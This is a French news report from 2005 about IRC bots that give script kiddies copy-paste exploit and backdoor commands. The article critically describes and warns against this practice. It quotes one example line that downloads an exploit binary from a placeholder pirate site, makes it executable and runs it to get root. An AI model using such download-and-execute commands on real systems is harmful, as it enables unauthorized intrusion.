Reportage

 

My name is Bot, RoBot

Publié le 30-08-2005 dans le thème Hacking

Pays : International - Auteur : Damien Bancal


Pub : Participez à des batailles navales sanglantes et gagnez 10000 € sur Bigpoint.fr

Note des lecteurs: 2.3/5

On connaissait les logiciels trouvés sur la toile qui permettaient de casser un mot de passe, d'espionner, dans certaines conditions, un internaute. Voici venir le chan IRC qui diffuse, à qui le souhaite, les méthodes, exploits et backdoors permettant le piratage. En un seul clic le massacre peut commencer. Par Damien Bancal

Ils s'appellent Piratax, Fr0z3nz, Stoopix, SlackWar3. Le point commun de ces internautes, ainsi que de plusieurs centaines d'autres est de se retrouver sur des chans IRC afin de récupérer des informations dédiées au piratage de serveurs Internet. Culture informatique proche du zéro, ils l'avouent eux-mêmes, ils n'ont jamais rien créé mais ont tous le même rêve : devenir un grand hacker. Pour espérer atteindre ce qui reste un éternel fantasme dans l'esprit d'une certaine catégorie d'internautes, il faut accéder aux exploits. Pour cela il y a deux contraintes : la première est de comprendre le code source de l'exploit utilisé et de le modifier à sa convenance si besoin est. La seconde est d'être capable d'utiliser un exploit publié (compilé parfois) afin de s'ouvrir les portes d'un serveur ou d'un site internet. Seulement aujourd'hui, il est possible de modifier une page web, ou d'accéder à un serveur dédié, sans même bouger le moindre petit neurone.

Pièges automatisés
Sur l'un des chans IRC découvert, le bot, un robot permettant d'automatiser certaines actions, est d'une gentillesse à toute épreuve. Selon les commandes envoyées, il propose l'exploit correspondant au mot-clé envoyé ainsi que les commandes à copier- coller pour utiliser celui-ci. Pour ce faire, le pirate qui a mis en place ce lieu de discussion particulier, a infiltré plusieurs serveurs web. Il y a placé des exploits publics, et certains privés, baptisés des "0days", qui permettent d'agir selon le mot-clé spécifié. "Ils vont télécharger des versions compilées d'un exploit, il ne reste plus qu'à l'exécuter, explique un utilisateur français. Moi, ça me permet de tenir à jour la base de données dédiée à la sécurité des clients de l'entreprise qui m'emploie." L'effet est effectivement saisissant.

Les pirates tapent par exemple une commande " !uselib ". Le bot du channel analyse dans sa base de données. Il recherche un exploit correspondant à ce service. Il n'en n'a pas, il renvoie évidemment une erreur. En revanche, dans le cas où il est en possession d'un exploit correspondant à ce service, il renvoie une ligne qui ressemble à celle-là : "wget www.sitepirate.com/0days/uselib; chmod 777 uselib ; ./uselib". Celui-ci communique l'endroit où est stocké l'exploit ainsi que la commande système pour le télécharger. Il permet de changer les droits de l'exploit une fois téléchargé, et donc de l'exécuter. Le pirate n'a donc plus qu'à copier cette ligne afin de devenir root, comprenez l'administrateur de la machine ciblée.

Le bot va nettement plus loin puisqu'il répond à la commande " !backdoor", il permet, une fois l'exploit téléchargé et exécuté, de refaire le même processus, cette fois avec les privilèges administrateurs pour installer une backdoor, comprenez une porte dérobée, afin de créer un accès sur la machine piratée. Cet accès va lui permettre d'y revenir plus tard. Cette backdoor est généralement en Perl ou compilée.

L'exemple "uselib" est assez probant, dans le sens où cet exploit existe vraiment pour la librairie en question. Il est donc possible d'utiliser l'exploit en 1 seconde en copiant les lignes données par le bot. Un accès de Calife à la place du Calife et cela en à peine 4 secondes.

"Ce genre d'espace est un véritable nid à pirates, explique John Jean, directeur de la société de sécurité informatique "Wargan solutions". En effet, la plupart des personnes exécutant ces binaires ne connaissent même pas le code source de ceux-ci, et encore moins leur fonctionnement. Il se peut qu'en créant un accès sur une machine, ils en créent également un à celui qui met à disposition ces binaires. Du piratage ou accès à un serveur à la portée de tous." Même plus besoin de réfléchir à l'acte. Seul le résultat compte. Une démocratisation du piratage qui risque d'entraîner des vagues d'arrestations dans les chambrées de ces internautes qui rêvaient tant d'être de grands pirates. "Avant, j'aidais les webmasters, explique l'un d'eux, Je n'avais même pas de merci. Aujourd'hui, au moins, je suis respecté". Le réveil risque d'être violent !



A lire, l'interview d'un pirate, spécialisé dans les attaques de Dénis de Services Distrbués (DDoS).

 

Conseiller cet article Réagir RSS ZATAZ Partager cet article sur Wikio Partager cet article sur Scoopeo Digger cet article ! Partager cet article avec mes amis sur Facebook ! Partager cet article sur Fuzz Partager cet article sur del.icio.us Envoyer cet article sur Blogmarks

Derniers contenus

Concours Coca Cola 2008

Vous venez de gagner un lot de 32.000 euros via un concours organisé par Coca-Cola. Une arnaque sans sucre.

Fuite de données via Google Bloc-notes

Un commercial de la société Vonage enregistré ses notes et données sensibles sur son espace privé Google Bloc-notes.

Un nouveau ver s'attaque aux réseaux d´entreprise

Une alerte concernant les nouvelles versions du ver Downadup. Ce ver infecte les postes de travail et serveurs Windows.

Espionnage informatique effectué par la police

Le département britannique de l´Intérieur annonce préparer un plan qui permettra à la police d´infiltrer et espionner les ordinateurs personnels de l´ensemble des citoyens.

Université des Correspondants Informatique et Libertés

L´Association Française des Correspondants Informatique et Libertés organise le 21 janvier prochain sa 3ème Université des Correspondants Informatique et Libertés.

La justice Chinoise s´attaque aux contrefacteurs

La Chine a rendu public huit importants cas de réseaux de contrefacteurs de films, logiciels et livres.

L´actualité juridique du mois de décembre

Comme il est de tradition sur ZATAZ depuis 13 ans, voici les actualités mensuelles de Maître Murielle Cahen, avocate spécialisée dans les NTIC.

Mort de Castlecops

Castlecops, association qui travaillait sur la cybercriminalité, vient d´annonce la cessation de ses activités.

Sur le même thème : Hacking

Piratage de Twitter... même pas peur

Une trentaine de sites installés chez Twitter piratés. Parmi les victimes Barack Obama et Britney Spears.

TGI Bonneville, une redirection politique ?

Le piratage du site Internet du Tribunal de Bonnevile effectuée à partir d'une redirection malveillante.

Le Tribunal de Grande Instance de Bonneville piraté

Exclusif : Le site Internet du Tribunal de Grande Instance de Bonneville transformé en nid à warez par un pirate informatique.

Guerre Israël-Palestine: Le front numérique engagé

Alors que les morts se comptent par centaine dans la bande de Gaza, le front numérique entre Israéliens et Pro-palestiniens prend de l'ampleur.

Deux personnes arrêtées dans l´affaire de la base de données de la BNP

Le mois dernier, une base de données contenant les identités de 13.000 adhérents au parti d´extrême droite anglais était diffusé sur Internet. Deux personnes viennent d´être arrêtées par la police.

Présidentielle de 2012: Le FN déjà dans les choux sur le web

Exclusif : Le site Internet du Front National pour les présidentielle de 2012 déjà cyber squatté. Marine va pas être contente.

Le quotidien d'Oran piraté

Le site officiel du Quotidien d´Oran, premier organe de presse en langue française en Algérie, piraté par un intrus informatique marocain.

Débandade sur plusieurs sites universitaire français

Six universités Françaises, ainsi que la Mairie de Brest, piégées par une pharmacie illégale basée sur Internet.

Vos réactions ( 0 )

Réagissez à ce contenu

Réagir

Vous devez vous identifier pour ajouter un commentaire.

Cliquer ici pour vous inscrire.

Derniers communiqués de presse

Microsoft Techdays

3ème édition des Microsoft Techdays, le rendez-vous des professionnels de l´informatique, développeurs et décideurs techniques.

IMAGE X5

KLIPSCH dévoile ses nouveaux écouteurs : IMAGE X5, l’audio à emporter.

DiVX basé sur le H.264

DivX annonce la nouvelle génération de son logiciel, DivX 7, basé sur le H.264 La nouvelle version permet de lire des vidéos HD, sur les PC et d’autres appareils.

Dans la boule de cristale de Websense

Prévisions des actes de piratage informatique en 2009 par les laboratoires de sécurité Websense.

Stars-buzz.com

Calendrier Aubade: janvier

La marque de lingerie féminine, Aubade, nous a encore une fois gratifié d?un sublime calendrier mettant en scène ses divers produits. Retrouvez la page du mois de Janvier. Une leçon de séduction en douze parties qui fait merveille dans le calendrier 2009 de la marque de lingerie Aubade. Ce dernier est téléchargeable ici. Nous vous proposons chaque [...]

Calendrier Aubade 2009

La marque de lingerie féminine, Aubade, nous a encore une fois gratifié d’un sublime calendrier mettant en scène ses divers produits. Retrouvez la page du mois en cours. Une leçon de séduction en douze parties qui fait merveille dans le calendrier 2009. Ce dernier est téléchargeable ici. Nous vous proposons chaque 1er du mois de retrouver la [...]

Stars-Buzz.com, deuxième

Bonjour, Stars-buzz.com n’est pas mort. Toujours là pour vous faire croustiller de news sur le cinéma, la musique, le cinéma. Le grand retour de vos actualités décalées comme vous les aimé à partir du 1er janvier 2009. Une légère boulette informatique a fait que nos serveurs ont fait pffittt… Certainement un coup de Bratt Pitt ! Dès le [...]

Syndication RSS

nabaztag

  • http://www.wikio.fr
  • netvibes
  • NewsGator Online
  • Rojo
  • Bloglines
  • Google

ZATAZ mobile et PDA